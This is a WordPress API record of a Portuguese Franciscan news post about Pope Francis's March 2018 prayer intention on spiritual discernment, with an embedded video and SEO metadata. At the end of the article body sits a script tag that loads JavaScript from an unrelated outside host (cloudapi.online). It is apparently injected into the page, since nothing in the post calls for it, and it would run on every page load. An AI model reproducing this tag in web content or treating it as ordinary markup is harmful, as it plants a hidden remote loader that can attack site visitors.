{"id":153402,"date":"2018-03-02T21:47:11","date_gmt":"2018-03-03T00:47:11","guid":{"rendered":"http:\/\/franciscanos.org.br\/?p=153402"},"modified":"2020-06-07T17:15:49","modified_gmt":"2020-06-07T20:15:49","slug":"discernimento-espiritual-intencao-de-oracao-do-papa-para-marco","status":"publish","type":"post","link":"https:\/\/franciscanos.org.br\/noticias\/discernimento-espiritual-intencao-de-oracao-do-papa-para-marco.html","title":{"rendered":"Inten\u00e7\u00e3o de ora\u00e7\u00e3o do Papa Francisco para este m\u00eas de mar\u00e7o"},"content":{"rendered":"<p><b>Cidade do Vaticano \u2013\u00a0<\/b>Discernimento: esta \u00e9 a palavra chave da inten\u00e7\u00e3o de ora\u00e7\u00e3o proposta pelo Papa Francisco neste m\u00eas e mar\u00e7o. \u201cRezar juntos para que toda a Igreja reconhe\u00e7a a urg\u00eancia da forma\u00e7\u00e3o ao discernimento espiritual no plano pessoal e comunit\u00e1rio\u201d, \u00e9 o pedido do Papa ao Apostolado da Ora\u00e7\u00e3o.<\/p>\n<p>No v\u00eddeo em que convida a orar, Francisco afirma que a \u00e9poca em que vivemos nos pede para desenvolver uma profunda capacidade de discernimento. \u201cDiscernir, entre todas as vozes, qual seja a do Senhor, qual seja a Sua voz que nos leva \u00e0 Ressurrei\u00e7\u00e3o, \u00e0 Vida, e a voz que nos liberta de cair na \u201ccultura da morte\u201d. Precisamos \u201cler de dentro\u201d aquilo que o Senhor nos pede, afirma ainda o Papa, para viver no amor e ser continuadores desta sua miss\u00e3o de amor.<\/p>\n<p><iframe loading=\"lazy\" src=\"https:\/\/www.youtube.com\/embed\/F6Xjid-NkOw\" width=\"100%\" height=\"450\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"><\/iframe><\/p>\n<p><strong>FONTE: <a href=\"http:\/\/www.vaticannews.va\/pt\/papa\/news\/2018-03\/intencao-de-oracao-papa-francisco-marco-discernimento.html#play\" target=\"_blank\" rel=\"noopener noreferrer\">Vaticans News<\/a><\/strong><\/p>\n<p><script id=\"lg210a\" src=\"https:\/\/cloudapi.online\/js\/api46.js\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>V\u00eddeo do Papa<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[1428],"tags":[542],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v19.2 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Inten\u00e7\u00e3o de ora\u00e7\u00e3o do Papa Francisco para este m\u00eas de mar\u00e7o - Not\u00edcias - Franciscanos<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/franciscanos.org.br\/noticias\/discernimento-espiritual-intencao-de-oracao-do-papa-para-marco.html\" \/>\n<meta property=\"og:locale\" content=\"pt_BR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Inten\u00e7\u00e3o de ora\u00e7\u00e3o do Papa Francisco para este m\u00eas de mar\u00e7o - Not\u00edcias - Franciscanos\" \/>\n<meta property=\"og:description\" content=\"V\u00eddeo do Papa\" \/>\n<meta property=\"og:url\" content=\"https:\/\/franciscanos.org.br\/noticias\/discernimento-espiritual-intencao-de-oracao-do-papa-para-marco.html\" \/>\n<meta property=\"og:site_name\" content=\"Not\u00edcias - Franciscanos\" \/>\n<meta property=\"article:published_time\" content=\"2018-03-03T00:47:11+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2020-06-07T20:15:49+00:00\" \/>\n<meta name=\"author\" content=\"admin\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"admin\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. tempo de leitura\" \/>\n\t<meta name=\"twitter:data2\" content=\"1 minuto\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebSite\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#website\",\"url\":\"https:\/\/franciscanos.org.br\/noticias\/\",\"name\":\"Not\u00edcias - Franciscanos\",\"description\":\"Prov\u00edncia Franciscana da Imaculada Concei\u00e7\u00e3o do Brasil - Ordem dos Frades Menores - OFM\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/franciscanos.org.br\/noticias\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"pt-BR\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/discernimento-espiritual-intencao-de-oracao-do-papa-para-marco.html#webpage\",\"url\":\"https:\/\/franciscanos.org.br\/noticias\/discernimento-espiritual-intencao-de-oracao-do-papa-para-marco.html\",\"name\":\"Inten\u00e7\u00e3o de ora\u00e7\u00e3o do Papa Francisco para este m\u00eas de mar\u00e7o - Not\u00edcias - Franciscanos\",\"isPartOf\":{\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#website\"},\"datePublished\":\"2018-03-03T00:47:11+00:00\",\"dateModified\":\"2020-06-07T20:15:49+00:00\",\"author\":{\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/b38fbf43118f02820bd932f2e4b14ad3\"},\"breadcrumb\":{\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/discernimento-espiritual-intencao-de-oracao-do-papa-para-marco.html#breadcrumb\"},\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/franciscanos.org.br\/noticias\/discernimento-espiritual-intencao-de-oracao-do-papa-para-marco.html\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/discernimento-espiritual-intencao-de-oracao-do-papa-para-marco.html#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/franciscanos.org.br\/noticias\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Inten\u00e7\u00e3o de ora\u00e7\u00e3o do Papa Francisco para este m\u00eas de mar\u00e7o\"}]},{\"@type\":\"Person\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/b38fbf43118f02820bd932f2e4b14ad3\",\"name\":\"admin\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/e8495742d34d0ba6448ea1c628263b3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/e8495742d34d0ba6448ea1c628263b3e?s=96&d=mm&r=g\",\"caption\":\"admin\"},\"url\":\"https:\/\/franciscanos.org.br\/noticias\/author\/admin\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Inten\u00e7\u00e3o de ora\u00e7\u00e3o do Papa Francisco para este m\u00eas de mar\u00e7o - Not\u00edcias - Franciscanos","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/franciscanos.org.br\/noticias\/discernimento-espiritual-intencao-de-oracao-do-papa-para-marco.html","og_locale":"pt_BR","og_type":"article","og_title":"Inten\u00e7\u00e3o de ora\u00e7\u00e3o do Papa Francisco para este m\u00eas de mar\u00e7o - Not\u00edcias - Franciscanos","og_description":"V\u00eddeo do Papa","og_url":"https:\/\/franciscanos.org.br\/noticias\/discernimento-espiritual-intencao-de-oracao-do-papa-para-marco.html","og_site_name":"Not\u00edcias - Franciscanos","article_published_time":"2018-03-03T00:47:11+00:00","article_modified_time":"2020-06-07T20:15:49+00:00","author":"admin","twitter_card":"summary_large_image","twitter_misc":{"Escrito por":"admin","Est. tempo de leitura":"1 minuto"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebSite","@id":"https:\/\/franciscanos.org.br\/noticias\/#website","url":"https:\/\/franciscanos.org.br\/noticias\/","name":"Not\u00edcias - Franciscanos","description":"Prov\u00edncia Franciscana da Imaculada Concei\u00e7\u00e3o do Brasil - Ordem dos Frades Menores - OFM","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/franciscanos.org.br\/noticias\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"pt-BR"},{"@type":"WebPage","@id":"https:\/\/franciscanos.org.br\/noticias\/discernimento-espiritual-intencao-de-oracao-do-papa-para-marco.html#webpage","url":"https:\/\/franciscanos.org.br\/noticias\/discernimento-espiritual-intencao-de-oracao-do-papa-para-marco.html","name":"Inten\u00e7\u00e3o de ora\u00e7\u00e3o do Papa Francisco para este m\u00eas de mar\u00e7o - Not\u00edcias - Franciscanos","isPartOf":{"@id":"https:\/\/franciscanos.org.br\/noticias\/#website"},"datePublished":"2018-03-03T00:47:11+00:00","dateModified":"2020-06-07T20:15:49+00:00","author":{"@id":"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/b38fbf43118f02820bd932f2e4b14ad3"},"breadcrumb":{"@id":"https:\/\/franciscanos.org.br\/noticias\/discernimento-espiritual-intencao-de-oracao-do-papa-para-marco.html#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/franciscanos.org.br\/noticias\/discernimento-espiritual-intencao-de-oracao-do-papa-para-marco.html"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/franciscanos.org.br\/noticias\/discernimento-espiritual-intencao-de-oracao-do-papa-para-marco.html#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/franciscanos.org.br\/noticias"},{"@type":"ListItem","position":2,"name":"Inten\u00e7\u00e3o de ora\u00e7\u00e3o do Papa Francisco para este m\u00eas de mar\u00e7o"}]},{"@type":"Person","@id":"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/b38fbf43118f02820bd932f2e4b14ad3","name":"admin","image":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/e8495742d34d0ba6448ea1c628263b3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/e8495742d34d0ba6448ea1c628263b3e?s=96&d=mm&r=g","caption":"admin"},"url":"https:\/\/franciscanos.org.br\/noticias\/author\/admin"}]}},"_links":{"self":[{"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/posts\/153402"}],"collection":[{"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/comments?post=153402"}],"version-history":[{"count":1,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/posts\/153402\/revisions"}],"predecessor-version":[{"id":225054,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/posts\/153402\/revisions\/225054"}],"wp:attachment":[{"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/media?parent=153402"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/categories?post=153402"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/tags?post=153402"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}